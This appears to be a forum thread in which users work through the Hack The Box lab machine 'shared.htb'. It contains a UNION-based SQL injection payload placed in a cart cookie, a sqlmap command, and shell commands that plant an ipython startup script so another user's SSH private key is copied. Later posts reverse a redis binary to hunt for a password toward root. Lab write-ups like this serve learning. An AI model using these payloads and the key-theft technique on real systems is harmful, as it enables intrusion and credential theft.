Posts: 9 Threads: 0 Joined: N/A July 24, 2022 at 12:41 AM (July 23, 2022, 10:08 PM)OldName2 Wrote: (July 23, 2022, 09:57 PM)Exa Wrote: (July 23, 2022, 08:11 PM)OldName2 Wrote: If you put something in the cart and proceed to checkout you'll be redirected to checkout.shared.htb with the cart contents within a cookie.
That might be injectable.
Changing the cookie from {"53GG2EF8":"1"} to {"53GG'+'2EF8":"1"} does not make a difference. This might be an SQL injection.
It has to be, but im not getting it to work. I've also tried SQLMAP
sqlmap -u "https://checkout.shared.htb/" --cookie "custom_cart={"*":"1*","*":"1"}" -batch --level=5
(July 23, 2022, 10:08 PM)OldName2 Wrote: (July 23, 2022, 09:57 PM)Exa Wrote: (July 23, 2022, 08:11 PM)OldName2 Wrote: If you put something in the cart and proceed to checkout you'll be redirected to checkout.shared.htb with the cart contents within a cookie.
That might be injectable.
Changing the cookie from {"53GG2EF8":"1"} to {"53GG'+'2EF8":"1"} does not make a difference. This might be an SQL injection.
It has to be, but im not getting it to work. I've also tried SQLMAP
sqlmap -u "https://checkout.shared.htb/" --cookie "custom_cart={"*":"1*","*":"1"}" -batch --level=5
Uh got it working
{"53G'+'G2EF8'UNION SELECT NULL,NULL,NULL-- -":"1"} Bit confused on what the whole sqlmap payload was? Trying similar ones but it's not giving me a response Posts: 10 Threads: 0 Joined: N/A July 24, 2022 at 12:46 AM (July 24, 2022, 12:41 AM)vinciwashere Wrote: (July 23, 2022, 10:08 PM)OldName2 Wrote: (July 23, 2022, 09:57 PM)Exa Wrote: (July 23, 2022, 08:11 PM)OldName2 Wrote: If you put something in the cart and proceed to checkout you'll be redirected to checkout.shared.htb with the cart contents within a cookie.
That might be injectable.
Changing the cookie from {"53GG2EF8":"1"} to {"53GG'+'2EF8":"1"} does not make a difference. This might be an SQL injection.
It has to be, but im not getting it to work. I've also tried SQLMAP
sqlmap -u "https://checkout.shared.htb/" --cookie "custom_cart={"*":"1*","*":"1"}" -batch --level=5
(July 23, 2022, 10:08 PM)OldName2 Wrote: (July 23, 2022, 09:57 PM)Exa Wrote: (July 23, 2022, 08:11 PM)OldName2 Wrote: If you put something in the cart and proceed to checkout you'll be redirected to checkout.shared.htb with the cart contents within a cookie.
That might be injectable.
Changing the cookie from {"53GG2EF8":"1"} to {"53GG'+'2EF8":"1"} does not make a difference. This might be an SQL injection.
It has to be, but im not getting it to work. I've also tried SQLMAP
sqlmap -u "https://checkout.shared.htb/" --cookie "custom_cart={"*":"1*","*":"1"}" -batch --level=5
Uh got it working
{"53G'+'G2EF8'UNION SELECT NULL,NULL,NULL-- -":"1"}
Bit confused on what the whole sqlmap payload was? Trying similar ones but it's not giving me a response it wont work like This.... Try Doing it manuley . First go to Order Something then change the Cookie . When you are Done Click Cont... to order and it will send you to checkout subdomain and you will See it. Posts: 166 Threads: 0 Joined: N/A (July 24, 2022, 12:27 AM)blahblah Wrote: (July 23, 2022, 11:58 PM)yumi Wrote: /bin/sh -c /usr/bin/pkill ipython; cd /opt/scripts_review/ && /usr/local/bin/ipython
Searching in web about ipython
Found That https://security.snyk.io/vuln/SNYK-PYTHON-IPYTHON-2348630
ipython --version Shows : 8.0.0
(July 24, 2022, 12:27 AM)blahblah Wrote: (July 23, 2022, 11:58 PM)yumi Wrote: /bin/sh -c /usr/bin/pkill ipython; cd /opt/scripts_review/ && /usr/local/bin/ipython
Searching in web about ipython
Found That https://security.snyk.io/vuln/SNYK-PYTHON-IPYTHON-2348630
ipython --version Shows : 8.0.0
and This looks Fine : https://github.com/ipython/ipython/security/advisories/GHSA-pq7m-3gw7-gq5x Yes I found it and I'm testing some scripts the scripts are deleted but so far I can't get a shell, maybe copying the ssh key to another location if it has Posts: 19 Threads: 0 Joined: N/A mkdir -m 777 /opt/scripts_review/profile_default
mkdir -m 777 /opt/scripts_review/profile_default/startup
echo "import os; os.system('cat ~/.ssh/id_rsa > ~/rsa')" > /opt/scripts_review/profile_default/startup/foo.py
and look in the '/home/dan_smith' folder Posts: 10 Threads: 0 Joined: N/A (July 24, 2022, 01:10 AM)Truss46 Wrote: mkdir -m 777 /opt/scripts_review/profile_default
mkdir -m 777 /opt/scripts_review/profile_default/startup
echo "import os; os.system('cat ~/.ssh/id_rsa > ~/rsa')" > /opt/scripts_review/profile_default/startup/foo.py
and look in the '/home/dan_smith' folder Woop ! , I did not know that i need to make new dir ! , I was Thinking it already has been Created but Okay Thanks !. Posts: 27 Threads: 0 Joined: N/A looks like redis is the way to root there is /usr/local/redis_connector_dev but can't figure out where the pass is in it. Posts: 10 Threads: 0 Joined: N/A (July 24, 2022, 02:17 AM)rubymurakami Wrote: looks like redis is the way to root there is /usr/local/redis_connector_dev but can't figure out where the pass is in it. There Some Text if you use Strings on it ..... But Still Could not Find anything , Did you Find Something ? Posts: 27 Threads: 0 Joined: N/A (July 24, 2022, 02:47 AM)blahblah Wrote: (July 24, 2022, 02:17 AM)rubymurakami Wrote: looks like redis is the way to root there is /usr/local/redis_connector_dev but can't figure out where the pass is in it.
There Some Text if you use Strings on it ..... But Still Could not Find anything , Did you Find Something ? tried the exact same thing nothing just yet but I am sure it has to be this file since the output when running the command states logging in to redis Posts: 10 Threads: 0 Joined: N/A (July 24, 2022, 02:52 AM)rubymurakami Wrote: (July 24, 2022, 02:47 AM)blahblah Wrote: (July 24, 2022, 02:17 AM)rubymurakami Wrote: looks like redis is the way to root there is /usr/local/redis_connector_dev but can't figure out where the pass is in it.
There Some Text if you use Strings on it ..... But Still Could not Find anything , Did you Find Something ?
tried the exact same thing nothing just yet but I am sure it has to be this file since the output when running the command states logging in to redis Using r2 Then afl Showed me This : sym.github.com_go_redis_redis._Conn_.Auth , Try it with me Since i dont know r2 That much Posts: 27 Threads: 0 Joined: N/A (July 24, 2022, 02:54 AM)blahblah Wrote: (July 24, 2022, 02:52 AM)rubymurakami Wrote: (July 24, 2022, 02:47 AM)blahblah Wrote: (July 24, 2022, 02:17 AM)rubymurakami Wrote: looks like redis is the way to root there is /usr/local/redis_connector_dev but can't figure out where the pass is in it.
There Some Text if you use Strings on it ..... But Still Could not Find anything , Did you Find Something ?
tried the exact same thing nothing just yet but I am sure it has to be this file since the output when running the command states logging in to redis
Using r2 Then afl Showed me This : sym.github.com_go_redis_redis._Conn_.Auth , Try it with me Since i dont know r2 That much I'm not a pro with it either about to read up on it right now I think we are heading in the right direction to say the least. |
